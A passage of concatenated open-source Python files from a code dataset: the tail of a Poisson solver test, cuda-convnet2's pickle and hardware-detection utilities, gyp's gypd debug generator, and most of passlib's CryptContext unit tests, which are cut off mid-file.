fN = Solver(D * G) * (sol(self.M.gridCC))
err = np.linalg.norm((fA - fN), np.inf)
return err
def test_orderForward(self):
self.name = "Poisson Equation - Forward"
self.forward = True
self.orderTest()
def test_orderBackward(self):
self.name = "Poisson Equation - Backward"
self.forward = False
self.orderTest()
if __name__ == "__main__":
unittest.main()
| mit |
abhaysac/cuda-convnet2 | python_util/util.py | 181 | 2825 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cPickle
import os
from cStringIO import StringIO
class UnpickleError(Exception):
pass
GPU_LOCK_NO_SCRIPT = -2
GPU_LOCK_NO_LOCK = -1
def pickle(filename, data):
fo = filename
if type(filename) == str:
fo = open(filename, "w")
cPickle.dump(data, fo, protocol=cPickle.HIGHEST_PROTOCOL)
fo.close()
def unpickle(filename):
if not os.path.exists(filename):
raise UnpickleError("Path '%s' does not exist." % filename)
fo = open(filename, 'r')
z = StringIO()
file_size = os.fstat(fo.fileno()).st_size
# Read 1GB at a time to avoid overflow
while fo.tell() < file_size:
z.write(fo.read(1 << 30))
fo.close()
dict = cPickle.loads(z.getvalue())
z.close()
return dict
def is_intel_machine():
VENDOR_ID_REGEX = re.compile('^vendor_id\s+: (\S+)')
f = open('/proc/cpuinfo')
for line in f:
m = VENDOR_ID_REGEX.match(line)
if m:
f.close()
return m.group(1) == 'GenuineIntel'
f.close()
return False
# Returns the CPUs associated with a given GPU
def get_cpus_for_gpu(gpu):
#proc = subprocess.Popen(['nvidia-smi', '-q', '-i', str(gpu)], stdout=subprocess.PIPE)
#lines = proc.communicate()[0]
#lines = subprocess.check_output(['nvidia-smi', '-q', '-i', str(gpu)]).split(os.linesep)
with open('/proc/driver/nvidia/gpus/%d/information' % gpu) as f:
for line in f:
if line.startswith('Bus Location'):
bus_id = line.split(':', 1)[1].strip()
bus_id = bus_id[:7] + ':' + bus_id[8:]
ff = open('/sys/module/nvidia/drivers/pci:nvidia/%s/local_cpulist' % bus_id)
cpus_str = ff.readline()
ff.close()
cpus = [cpu for s in cpus_str.split(',') for cpu in range(int(s.split('-')[0]),int(s.split('-')[1])+1)]
return cpus
return [-1]
def get_cpu():
if is_intel_machine():
return 'intel'
return 'amd'
def is_windows_machine():
return os.name == 'nt'
def tryint(s):
try:
return int(s)
except:
return s
def alphanum_key(s):
return [tryint(c) for c in re.split('([0-9]+)', s)]
| apache-2.0 |
gitromand/phantomjs | src/breakpad/src/tools/gyp/pylib/gyp/generator/gypd.py | 151 | 3320 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypd output module
This module produces gyp input as its output. Output files are given the
.gypd extension to avoid overwriting the .gyp files that they are generated
from. Internal references to .gyp files (such as those found in
"dependencies" sections) are not adjusted to point to .gypd files instead;
unlike other paths, which are relative to the .gyp or .gypd file, such paths
are relative to the directory from which gyp was run to create the .gypd file.
This generator module is intended to be a sample and a debugging aid, hence
the "d" for "debug" in .gypd. It is useful to inspect the results of the
various merges, expansions, and conditional evaluations performed by gyp
and to see a representation of what would be fed to a generator module.
It's not advisable to rename .gypd files produced by this module to .gyp,
because they will have all merges, expansions, and evaluations already
performed and the relevant constructs not present in the output; paths to
dependencies may be wrong; and various sections that do not belong in .gyp
files such as such as "included_files" and "*_excluded" will be present.
Output will also be stripped of comments. This is not intended to be a
general-purpose gyp pretty-printer; for that, you probably just want to
run "pprint.pprint(eval(open('source.gyp').read()))", which will still strip
comments but won't do all of the other things done to this module's output.
The specific formatting of the output generated by this module is subject
to change.
"""
import gyp.common
import errno
import os
import pprint
# These variables should just be spit back out as variable references.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
# gypd doesn't define a default value for OS like many other generator
# modules. Specify "-D OS=whatever" on the command line to provide a value.
generator_default_variables = {
}
# gypd supports multiple toolsets
generator_supports_multiple_toolsets = True
# TODO(mark): This always uses <, which isn't right. The input module should
# notify the generator to tell it which phase it is operating in, and this
# module should use < for the early phase and then switch to > for the late
# phase. Bonus points for carrying @ back into the output too.
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
output_files = {}
for qualified_target in target_list:
[input_file, target] = \
gyp.common.ParseQualifiedTarget(qualified_target)[0:2]
if input_file[-4:] != '.gyp':
continue
input_file_stem = input_file[:-4]
output_file = input_file_stem + params['options'].suffix + '.gypd'
if not output_file in output_files:
output_files[output_file] = input_file
for output_file, input_file in output_files.iteritems():
output = open(output_file, 'w')
pprint.pprint(data[input_file], output)
output.close()
| bsd-3-clause |
austindlawless/cudas | lambda/signup/passlib/tests/test_context.py | 6 | 64739 | """tests for passlib.context"""
#=============================================================================
# imports
#=============================================================================
# core
from __future__ import with_statement
from passlib.utils.compat import PY3
if PY3:
from configparser import NoSectionError
else:
from ConfigParser import NoSectionError
import hashlib
import logging; log = logging.getLogger(__name__)
import re
import os
import time
import warnings
import sys
# site
# pkg
from passlib import hash
from passlib.context import CryptContext, LazyCryptContext
from passlib.exc import PasslibConfigWarning
from passlib.utils import tick, to_bytes, to_unicode
from passlib.utils.compat import irange, u, unicode, str_to_uascii, PY2
import passlib.utils.handlers as uh
from passlib.tests.utils import TestCase, catch_warnings, set_file, TICK_RESOLUTION, quicksleep
from passlib.registry import (register_crypt_handler_path,
_has_crypt_handler as has_crypt_handler,
_unload_handler_name as unload_handler_name,
get_crypt_handler,
)
# local
#=============================================================================
# support
#=============================================================================
here = os.path.abspath(os.path.dirname(__file__))
def merge_dicts(first, *args, **kwds):
target = first.copy()
for arg in args:
target.update(arg)
if kwds:
target.update(kwds)
return target
#=============================================================================
#
#=============================================================================
class CryptContextTest(TestCase):
descriptionPrefix = "CryptContext"
# TODO: these unittests could really use a good cleanup
# and reorganizing, to ensure they're getting everything.
#===================================================================
# sample configurations used in tests
#===================================================================
#---------------------------------------------------------------
# sample 1 - typical configuration
#---------------------------------------------------------------
sample_1_schemes = ["des_crypt", "md5_crypt", "bsdi_crypt", "sha512_crypt"]
sample_1_handlers = [get_crypt_handler(name) for name in sample_1_schemes]
sample_1_dict = dict(
schemes = sample_1_schemes,
default = "md5_crypt",
all__vary_rounds = 0.1,
bsdi_crypt__max_rounds = 30000,
bsdi_crypt__default_rounds = 25000,
sha512_crypt__max_rounds = 50000,
sha512_crypt__min_rounds = 40000,
)
sample_1_resolved_dict = merge_dicts(sample_1_dict,
schemes = sample_1_handlers)
sample_1_unnormalized = u("""\
[passlib]
schemes = des_crypt, md5_crypt, bsdi_crypt, sha512_crypt
default = md5_crypt
; this is using %...
all__vary_rounds = 10%%
; this is using 'rounds' instead of 'default_rounds'
bsdi_crypt__rounds = 25000
bsdi_crypt__max_rounds = 30000
sha512_crypt__max_rounds = 50000
sha512_crypt__min_rounds = 40000
""")
sample_1_unicode = u("""\
[passlib]
schemes = des_crypt, md5_crypt, bsdi_crypt, sha512_crypt
default = md5_crypt
all__vary_rounds = 0.1
bsdi_crypt__default_rounds = 25000
bsdi_crypt__max_rounds = 30000
sha512_crypt__max_rounds = 50000
sha512_crypt__min_rounds = 40000
""")
#---------------------------------------------------------------
# sample 1 external files
#---------------------------------------------------------------
# sample 1 string with '\n' linesep
sample_1_path = os.path.join(here, "sample1.cfg")
# sample 1 with '\r\n' linesep
sample_1b_unicode = sample_1_unicode.replace(u("\n"), u("\r\n"))
sample_1b_path = os.path.join(here, "sample1b.cfg")
# sample 1 using UTF-16 and alt section
sample_1c_bytes = sample_1_unicode.replace(u("[passlib]"),
u("[mypolicy]")).encode("utf-16")
sample_1c_path = os.path.join(here, "sample1c.cfg")
# enable to regenerate sample files
if False:
set_file(sample_1_path, sample_1_unicode)
set_file(sample_1b_path, sample_1b_unicode)
set_file(sample_1c_path, sample_1c_bytes)
#---------------------------------------------------------------
# sample 2 & 12 - options patch
#---------------------------------------------------------------
sample_2_dict = dict(
# using this to test full replacement of existing options
bsdi_crypt__min_rounds = 29000,
bsdi_crypt__max_rounds = 35000,
bsdi_crypt__default_rounds = 31000,
# using this to test partial replacement of existing options
sha512_crypt__min_rounds=45000,
)
sample_2_unicode = """\
[passlib]
bsdi_crypt__min_rounds = 29000
bsdi_crypt__max_rounds = 35000
bsdi_crypt__default_rounds = 31000
sha512_crypt__min_rounds = 45000
"""
# sample 2 overlayed on top of sample 1
sample_12_dict = merge_dicts(sample_1_dict, sample_2_dict)
#---------------------------------------------------------------
# sample 3 & 123 - just changing default from sample 1
#---------------------------------------------------------------
sample_3_dict = dict(
default="sha512_crypt",
)
# sample 3 overlayed on 2 overlayed on 1
sample_123_dict = merge_dicts(sample_12_dict, sample_3_dict)
#---------------------------------------------------------------
# sample 4 - used by api tests
#---------------------------------------------------------------
sample_4_dict = dict(
schemes = [ "des_crypt", "md5_crypt", "phpass", "bsdi_crypt",
"sha256_crypt"],
deprecated = [ "des_crypt", ],
default = "sha256_crypt",
bsdi_crypt__max_rounds = 30,
bsdi_crypt__default_rounds = 25,
bsdi_crypt__vary_rounds = 0,
sha256_crypt__max_rounds = 3000,
sha256_crypt__min_rounds = 2000,
sha256_crypt__default_rounds = 3000,
phpass__ident = "H",
phpass__default_rounds = 7,
)
#===================================================================
# constructors
#===================================================================
def test_01_constructor(self):
"""test class constructor"""
# test blank constructor works correctly
ctx = CryptContext()
self.assertEqual(ctx.to_dict(), {})
# test sample 1 with scheme=names
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 with scheme=handlers
ctx = CryptContext(**self.sample_1_resolved_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 2: options w/o schemes
ctx = CryptContext(**self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_2_dict)
# test sample 3: default only
ctx = CryptContext(**self.sample_3_dict)
self.assertEqual(ctx.to_dict(), self.sample_3_dict)
# test unicode scheme names (issue 54)
ctx = CryptContext(schemes=[u("sha256_crypt")])
self.assertEqual(ctx.schemes(), ("sha256_crypt",))
def test_02_from_string(self):
"""test from_string() constructor"""
# test sample 1 unicode
ctx = CryptContext.from_string(self.sample_1_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 with unnormalized inputs
ctx = CryptContext.from_string(self.sample_1_unnormalized)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 utf-8
ctx = CryptContext.from_string(self.sample_1_unicode.encode("utf-8"))
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 w/ '\r\n' linesep
ctx = CryptContext.from_string(self.sample_1b_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 using UTF-16 and alt section
ctx = CryptContext.from_string(self.sample_1c_bytes, section="mypolicy",
encoding="utf-16")
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test wrong type
self.assertRaises(TypeError, CryptContext.from_string, None)
# test missing section
self.assertRaises(NoSectionError, CryptContext.from_string,
self.sample_1_unicode, section="fakesection")
def test_03_from_path(self):
"""test from_path() constructor"""
# make sure sample files exist
if not os.path.exists(self.sample_1_path):
raise RuntimeError("can't find data file: %r" % self.sample_1_path)
# test sample 1
ctx = CryptContext.from_path(self.sample_1_path)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 w/ '\r\n' linesep
ctx = CryptContext.from_path(self.sample_1b_path)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 encoding using UTF-16 and alt section
ctx = CryptContext.from_path(self.sample_1c_path, section="mypolicy",
encoding="utf-16")
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test missing file
self.assertRaises(EnvironmentError, CryptContext.from_path,
os.path.join(here, "sample1xxx.cfg"))
# test missing section
self.assertRaises(NoSectionError, CryptContext.from_path,
self.sample_1_path, section="fakesection")
def test_04_copy(self):
"""test copy() method"""
cc1 = CryptContext(**self.sample_1_dict)
# overlay sample 2 onto copy
cc2 = cc1.copy(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc2.to_dict(), self.sample_12_dict)
# check that repeating overlay makes no change
cc2b = cc2.copy(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc2b.to_dict(), self.sample_12_dict)
# overlay sample 3 on copy
cc3 = cc2.copy(**self.sample_3_dict)
self.assertEqual(cc3.to_dict(), self.sample_123_dict)
# test empty copy creates separate copy
cc4 = cc1.copy()
self.assertIsNot(cc4, cc1)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc4.to_dict(), self.sample_1_dict)
# ... and that modifying copy doesn't affect original
cc4.update(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc4.to_dict(), self.sample_12_dict)
def test_09_repr(self):
"""test repr()"""
cc1 = CryptContext(**self.sample_1_dict)
self.assertRegex(repr(cc1), "^<CryptContext at 0x[0-9a-f]+>$")
#===================================================================
# modifiers
#===================================================================
def test_10_load(self):
"""test load() / load_path() method"""
# NOTE: load() is the workhorse that handles all policy parsing,
# compilation, and validation. most of its features are tested
# elsewhere, since all the constructors and modifiers are just
# wrappers for it.
# source_type 'auto'
ctx = CryptContext()
# detect dict
ctx.load(self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# detect unicode string
ctx.load(self.sample_1_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# detect bytes string
ctx.load(self.sample_1_unicode.encode("utf-8"))
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# anything else - TypeError
self.assertRaises(TypeError, ctx.load, None)
# NOTE: load_path() tested by from_path()
# NOTE: additional string tests done by from_string()
# update flag - tested by update() method tests
# encoding keyword - tested by from_string() & from_path()
# section keyword - tested by from_string() & from_path()
# test load empty
ctx = CryptContext(**self.sample_1_dict)
ctx.load({}, update=True)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# multiple loads should clear the state
ctx = CryptContext()
ctx.load(self.sample_1_dict)
ctx.load(self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_2_dict)
def test_11_load_rollback(self):
"""test load() errors restore old state"""
# create initial context
cc = CryptContext(["des_crypt", "sha256_crypt"],
sha256_crypt__default_rounds=5000,
all__vary_rounds=0.1,
)
result = cc.to_string()
# do an update operation that should fail during parsing
# XXX: not sure what the right error type is here.
self.assertRaises(TypeError, cc.update, too__many__key__parts=True)
self.assertEqual(cc.to_string(), result)
# do an update operation that should fail during extraction
# FIXME: this isn't failing even in broken case, need to figure out
# way to ensure some keys come after this one.
self.assertRaises(KeyError, cc.update, fake_context_option=True)
self.assertEqual(cc.to_string(), result)
# do an update operation that should fail during compilation
self.assertRaises(ValueError, cc.update, sha256_crypt__min_rounds=10000)
self.assertEqual(cc.to_string(), result)
def test_12_update(self):
"""test update() method"""
# empty overlay
ctx = CryptContext(**self.sample_1_dict)
ctx.update()
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test basic overlay
ctx = CryptContext(**self.sample_1_dict)
ctx.update(**self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# ... and again
ctx.update(**self.sample_3_dict)
self.assertEqual(ctx.to_dict(), self.sample_123_dict)
# overlay w/ dict arg
ctx = CryptContext(**self.sample_1_dict)
ctx.update(self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# overlay w/ string
ctx = CryptContext(**self.sample_1_dict)
ctx.update(self.sample_2_unicode)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# too many args
self.assertRaises(TypeError, ctx.update, {}, {})
self.assertRaises(TypeError, ctx.update, {}, schemes=['des_crypt'])
# wrong arg type
self.assertRaises(TypeError, ctx.update, None)
#===================================================================
# option parsing
#===================================================================
def test_20_options(self):
"""test basic option parsing"""
def parse(**kwds):
return CryptContext(**kwds).to_dict()
#
# common option parsing tests
#
# test keys with blank fields are rejected
# blank option
self.assertRaises(TypeError, CryptContext, __=0.1)
self.assertRaises(TypeError, CryptContext, default__scheme__='x')
# blank scheme
self.assertRaises(TypeError, CryptContext, __option='x')
self.assertRaises(TypeError, CryptContext, default____option='x')
# blank category
self.assertRaises(TypeError, CryptContext, __scheme__option='x')
# test keys with too many field are rejected
self.assertRaises(TypeError, CryptContext,
category__scheme__option__invalid = 30000)
# keys with mixed separators should be handled correctly.
# (testing actual data, not to_dict(), since re-render hid original bug)
self.assertRaises(KeyError, parse,
**{"admin.context__schemes":"md5_crypt"})
ctx = CryptContext(**{"schemes":"md5_crypt,des_crypt",
"admin.context__default":"des_crypt"})
self.assertEqual(ctx.default_scheme("admin"), "des_crypt")
#
# context option -specific tests
#
# test context option key parsing
result = dict(default="md5_crypt")
self.assertEqual(parse(default="md5_crypt"), result)
self.assertEqual(parse(context__default="md5_crypt"), result)
self.assertEqual(parse(default__context__default="md5_crypt"), result)
self.assertEqual(parse(**{"context.default":"md5_crypt"}), result)
self.assertEqual(parse(**{"default.context.default":"md5_crypt"}), result)
# test context option key parsing w/ category
result = dict(admin__context__default="md5_crypt")
self.assertEqual(parse(admin__context__default="md5_crypt"), result)
self.assertEqual(parse(**{"admin.context.default":"md5_crypt"}), result)
#
# hash option -specific tests
#
# test hash option key parsing
result = dict(all__vary_rounds=0.1)
self.assertEqual(parse(all__vary_rounds=0.1), result)
self.assertEqual(parse(default__all__vary_rounds=0.1), result)
self.assertEqual(parse(**{"all.vary_rounds":0.1}), result)
self.assertEqual(parse(**{"default.all.vary_rounds":0.1}), result)
# test hash option key parsing w/ category
result = dict(admin__all__vary_rounds=0.1)
self.assertEqual(parse(admin__all__vary_rounds=0.1), result)
self.assertEqual(parse(**{"admin.all.vary_rounds":0.1}), result)
# settings not allowed if not in hash.settings_kwds
ctx = CryptContext(["phpass", "md5_crypt"], phpass__ident="P")
self.assertRaises(KeyError, ctx.copy, md5_crypt__ident="P")
# hash options 'salt' and 'rounds' not allowed
self.assertRaises(KeyError, CryptContext, schemes=["des_crypt"],
des_crypt__salt="xx")
self.assertRaises(KeyError, CryptContext, schemes=["des_crypt"],
all__salt="xx")
def test_21_schemes(self):
"""test 'schemes' context option parsing"""
# schemes can be empty
cc = CryptContext(schemes=None)
self.assertEqual(cc.schemes(), ())
# schemes can be list of names
cc = CryptContext(schemes=["des_crypt", "md5_crypt"])
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# schemes can be comma-sep string
cc = CryptContext(schemes=" des_crypt, md5_crypt, ")
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# schemes can be list of handlers
cc = CryptContext(schemes=[hash.des_crypt, hash.md5_crypt])
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# scheme must be name or handler
self.assertRaises(TypeError, CryptContext, schemes=[uh.StaticHandler])
# handlers must have a name
class nameless(uh.StaticHandler):
name = None
self.assertRaises(ValueError, CryptContext, schemes=[nameless])
# names must be unique
class dummy_1(uh.StaticHandler):
name = 'dummy_1'
self.assertRaises(KeyError, CryptContext, schemes=[dummy_1, dummy_1])
# schemes not allowed per-category
self.assertRaises(KeyError, CryptContext,
admin__context__schemes=["md5_crypt"])
def test_22_deprecated(self):
"""test 'deprecated' context option parsing"""
def getdep(ctx, category=None):
return [name for name in ctx.schemes()
if ctx._is_deprecated_scheme(name, category)]
# no schemes - all deprecated values allowed
cc = CryptContext(deprecated=["md5_crypt"])
cc.update(schemes=["md5_crypt", "des_crypt"])
self.assertEqual(getdep(cc),["md5_crypt"])
# deprecated values allowed if subset of schemes
cc = CryptContext(deprecated=["md5_crypt"], schemes=["md5_crypt", "des_crypt"])
self.assertEqual(getdep(cc), ["md5_crypt"])
# can be handler
# XXX: allow handlers in deprecated list? not for now.
self.assertRaises(TypeError, CryptContext, deprecated=[hash.md5_crypt],
schemes=["md5_crypt", "des_crypt"])
## cc = CryptContext(deprecated=[hash.md5_crypt], schemes=["md5_crypt", "des_crypt"])
## self.assertEqual(getdep(cc), ["md5_crypt"])
# comma sep list
cc = CryptContext(deprecated="md5_crypt,des_crypt", schemes=["md5_crypt", "des_crypt", "sha256_crypt"])
self.assertEqual(getdep(cc), ["md5_crypt", "des_crypt"])
# values outside of schemes not allowed
self.assertRaises(KeyError, CryptContext, schemes=['des_crypt'],
deprecated=['md5_crypt'])
# deprecating ALL schemes should cause ValueError
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt'],
deprecated=['des_crypt'])
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__deprecated=['des_crypt', 'md5_crypt'])
# deprecating explicit default scheme should cause ValueError
# ... default listed as deprecated
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
default="md5_crypt",
deprecated="md5_crypt")
# ... global default deprecated per-category
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
default="md5_crypt",
admin__context__deprecated="md5_crypt")
# ... category default deprecated globally
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__default="md5_crypt",
deprecated="md5_crypt")
# ... category default deprecated in category
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__default="md5_crypt",
admin__context__deprecated="md5_crypt")
# category deplist should shadow default deplist
CryptContext(
schemes=['des_crypt', 'md5_crypt'],
deprecated="md5_crypt",
admin__context__default="md5_crypt",
admin__context__deprecated=[])
# wrong type
self.assertRaises(TypeError, CryptContext, deprecated=123)
# deprecated per-category
cc = CryptContext(deprecated=["md5_crypt"],
schemes=["md5_crypt", "des_crypt"],
admin__context__deprecated=["des_crypt"],
)
self.assertEqual(getdep(cc), ["md5_crypt"])
self.assertEqual(getdep(cc, "user"), ["md5_crypt"])
self.assertEqual(getdep(cc, "admin"), ["des_crypt"])
# blank per-category deprecated list, shadowing default list
cc = CryptContext(deprecated=["md5_crypt"],
schemes=["md5_crypt", "des_crypt"],
admin__context__deprecated=[],
)
self.assertEqual(getdep(cc), ["md5_crypt"])
self.assertEqual(getdep(cc, "user"), ["md5_crypt"])
self.assertEqual(getdep(cc, "admin"), [])
def test_23_default(self):
"""test 'default' context option parsing"""
# anything allowed if no schemes
self.assertEqual(CryptContext(default="md5_crypt").to_dict(),
dict(default="md5_crypt"))
# default allowed if in scheme list
ctx = CryptContext(default="md5_crypt", schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# default can be handler
# XXX: sure we want to allow this ? maybe deprecate in future.
ctx = CryptContext(default=hash.md5_crypt, schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# implicit default should be first non-deprecated scheme
ctx = CryptContext(schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "des_crypt")
ctx.update(deprecated="des_crypt")
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# error if not in scheme list
self.assertRaises(KeyError, CryptContext, schemes=['des_crypt'],
default='md5_crypt')
# wrong type
self.assertRaises(TypeError, CryptContext, default=1)
# per-category
ctx = CryptContext(default="des_crypt",
schemes=["des_crypt", "md5_crypt"],
admin__context__default="md5_crypt")
self.assertEqual(ctx.default_scheme(), "des_crypt")
self.assertEqual(ctx.default_scheme("user"), "des_crypt")
self.assertEqual(ctx.default_scheme("admin"), "md5_crypt")
def test_24_vary_rounds(self):
"""test 'vary_rounds' hash option parsing"""
def parse(v):
return CryptContext(all__vary_rounds=v).to_dict()['all__vary_rounds']
# floats should be preserved
self.assertEqual(parse(0.1), 0.1)
self.assertEqual(parse('0.1'), 0.1)
# 'xx%' should be converted to float
self.assertEqual(parse('10%'), 0.1)
# ints should be preserved
self.assertEqual(parse(1000), 1000)
self.assertEqual(parse('1000'), 1000)
#===================================================================
# inspection & serialization
#===================================================================
def test_30_schemes(self):
"""test schemes() method"""
# NOTE: also checked under test_21
# test empty
ctx = CryptContext()
self.assertEqual(ctx.schemes(), ())
self.assertEqual(ctx.schemes(resolve=True), ())
# test sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.schemes(), tuple(self.sample_1_schemes))
self.assertEqual(ctx.schemes(resolve=True), tuple(self.sample_1_handlers))
# test sample 2
ctx = CryptContext(**self.sample_2_dict)
self.assertEqual(ctx.schemes(), ())
def test_31_default_scheme(self):
"""test default_scheme() method"""
# NOTE: also checked under test_23
# test empty
ctx = CryptContext()
self.assertRaises(KeyError, ctx.default_scheme)
# test sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.default_scheme(), "md5_crypt")
self.assertEqual(ctx.default_scheme(resolve=True), hash.md5_crypt)
# test sample 2
ctx = CryptContext(**self.sample_2_dict)
self.assertRaises(KeyError, ctx.default_scheme)
# test defaults to first in scheme
ctx = CryptContext(schemes=self.sample_1_schemes)
self.assertEqual(ctx.default_scheme(), "des_crypt")
# categories tested under test_23
def test_32_handler(self):
"""test handler() method"""
# default for empty
ctx = CryptContext()
self.assertRaises(KeyError, ctx.handler)
self.assertRaises(KeyError, ctx.handler, "md5_crypt")
# default for sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.handler(), hash.md5_crypt)
# by name
self.assertEqual(ctx.handler("des_crypt"), hash.des_crypt)
# name not in schemes
self.assertRaises(KeyError, ctx.handler, "mysql323")
# check handler() honors category default
ctx = CryptContext("sha256_crypt,md5_crypt", admin__context__default="md5_crypt")
self.assertEqual(ctx.handler(), hash.sha256_crypt)
self.assertEqual(ctx.handler(category="staff"), hash.sha256_crypt)
self.assertEqual(ctx.handler(category="admin"), hash.md5_crypt)
# test unicode category strings are accepted under py2
if PY2:
self.assertEqual(ctx.handler(category=u("staff")), hash.sha256_crypt)
self.assertEqual(ctx.handler(category=u("admin")), hash.md5_crypt)
def test_33_options(self):
"""test internal _get_record_options() method"""
def options(ctx, scheme, category=None):
return ctx._config._get_record_options_with_flag(scheme, category)[0]
# this checks that (3 schemes, 3 categories) inherit options correctly.
# the 'user' category is not present in the options.
cc4 = CryptContext(
schemes = [ "sha512_crypt", "des_crypt", "bsdi_crypt"],
deprecated = ["sha512_crypt", "des_crypt"],
all__vary_rounds = 0.1,
bsdi_crypt__vary_rounds=0.2,
sha512_crypt__max_rounds = 20000,
admin__context__deprecated = [ "des_crypt", "bsdi_crypt" ],
admin__all__vary_rounds = 0.05,
admin__bsdi_crypt__vary_rounds=0.3,
admin__sha512_crypt__max_rounds = 40000,
)
self.assertEqual(cc4._config.categories, ("admin",))
#
# sha512_crypt
#
self.assertEqual(options(cc4, "sha512_crypt"), dict(
deprecated=True,
vary_rounds=0.1, # inherited from all__
max_rounds=20000,
))
self.assertEqual(options(cc4, "sha512_crypt", "user"), dict(
deprecated=True, # unconfigured category inherits from default
vary_rounds=0.1,
max_rounds=20000,
))
self.assertEqual(options(cc4, "sha512_crypt", "admin"), dict(
# NOT deprecated - context option overridden per-category
vary_rounds=0.05, # global overridden per-cateogry
max_rounds=40000, # overridden per-category
))
#
# des_crypt
#
self.assertEqual(options(cc4, "des_crypt"), dict(
deprecated=True,
vary_rounds=0.1,
))
self.assertEqual(options(cc4, "des_crypt", "user"), dict(
deprecated=True, # unconfigured category inherits from default
vary_rounds=0.1,
))
self.assertEqual(options(cc4, "des_crypt", "admin"), dict(
deprecated=True, # unchanged though overidden
vary_rounds=0.05, # global overridden per-cateogry
))
#
# bsdi_crypt
#
self.assertEqual(options(cc4, "bsdi_crypt"), dict(
vary_rounds=0.2, # overridden from all__vary_rounds
))
self.assertEqual(options(cc4, "bsdi_crypt", "user"), dict(
vary_rounds=0.2, # unconfigured category inherits from default
))
self.assertEqual(options(cc4, "bsdi_crypt", "admin"), dict(
vary_rounds=0.3,
deprecated=True, # deprecation set per-category
))
def test_34_to_dict(self):
"""test to_dict() method"""
# NOTE: this is tested all throughout this test case.
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
self.assertEqual(ctx.to_dict(resolve=True), self.sample_1_resolved_dict)
def test_35_to_string(self):
"""test to_string() method"""
# create ctx and serialize
ctx = CryptContext(**self.sample_1_dict)
dump = ctx.to_string()
# check ctx->string returns canonical format.
# NOTE: ConfigParser for PY26 and earlier didn't use OrderedDict,
# so to_string() won't get order correct.
# so we skip this test.
import sys
if sys.version_info >= (2,7):
self.assertEqual(dump, self.sample_1_unicode)
# check ctx->string->ctx->dict returns original
ctx2 = CryptContext.from_string(dump)
self.assertEqual(ctx2.to_dict(), self.sample_1_dict)
# test section kwd is honored
other = ctx.to_string(section="password-security")
self.assertEqual(other, dump.replace("[passlib]","[password-security]"))
# test unmanaged handler warning
from passlib.tests.test_utils_handlers import UnsaltedHash
ctx3 = CryptContext([UnsaltedHash, "md5_crypt"])
dump = ctx3.to_string()
self.assertRegex(dump, r"# NOTE: the 'unsalted_test_hash' handler\(s\)"
r" are not registered with Passlib")
#===================================================================
# password hash api
#===================================================================
nonstring_vectors = [
(None, {}),
(None, {"scheme": "des_crypt"}),
(1, {}),
((), {}),
]
def test_40_basic(self):
